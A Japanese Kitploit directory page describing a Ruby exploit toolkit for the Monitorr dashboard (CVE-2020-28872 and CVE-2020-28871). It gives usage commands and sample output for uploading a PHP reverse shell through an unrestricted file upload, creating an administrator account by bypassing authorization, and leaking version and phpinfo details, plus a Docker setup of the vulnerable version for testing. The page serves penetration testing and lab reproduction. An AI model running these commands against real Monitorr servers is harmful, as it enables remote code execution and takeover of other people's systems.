Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
monitorr-exploit-toolkit — Monitorr 用の複数のエクスプロイト | Kitploit
ツール/GitHubGitHub/sec-it/monitorr-exploit-toolkit
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Monitorr 用の複数のエクスプロイト

リポジトリを見る
1015年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Monitorr エクスプロイトツールキット

  • RCE は 安全でないファイルアップロード によるもの(PHP リバースシェル、ウェブシェルなど)
  • 管理者アカウント作成 は 認証バイパス によるもの
  • 技術情報の漏えい: Monitorr バージョン、PHP バージョン、システムバージョンとカーネル、PHP 設定など

エクスプロイト対象: CVE-2020-28872 および CVE-2020-28871。

[PacketStorm]

使い方

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

使用例

リバースシェルをアップロード:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

管理者アカウントの作成:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Monitorr バージョンの取得:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

phpinfp() を取得:

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

要件

  • httpx
  • docopt.rb

gem を使用する例:

root@kitploit:~
bundle install
# or
gem install httpx docopt

脆弱性のあるソフトウェアの Docker デプロイ

警告: もちろん、この構成は本番利用には適していません。

root@kitploit:~
$ sudo docker-compose up

http://127.0.0.1:7000/monitorr/settings.php でアプリをセットアップ/初期化してください。

制限事項

  • アップロード: アップロードするファイルは、getimagesize に一致するために画像マジックバイト(例: GIF)を含む必要があります(コード)
  • 作成: パスワード作成時に使用するパスワードは 6 文字以上である必要があります(アプリの最小制限)

参照

  • 対象ソフトウェア: Monitorr
    • ソース: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • 脆弱性のあるバージョン: 1.7.6m

これは、EDB-48981(CVE-2020-28872)と EDB-48980(CVE-2020-28871)をより良く書き直し、融合したもので、追加機能も備えています。

アップロードおよび管理者アカウント作成の脆弱性は、Lyhin's Lab によって発見されました。phpinfo と Monitorr バージョンの漏えいは、Alexandre ZANNI aka noraj によって発見されました。

元のエクスプロイトと脆弱性の分析:

  • ホワイトボックスハッキングの仕組み: Monitorr 1.7.6 における認証バイパスとリモートコード実行
ツールをダウンロード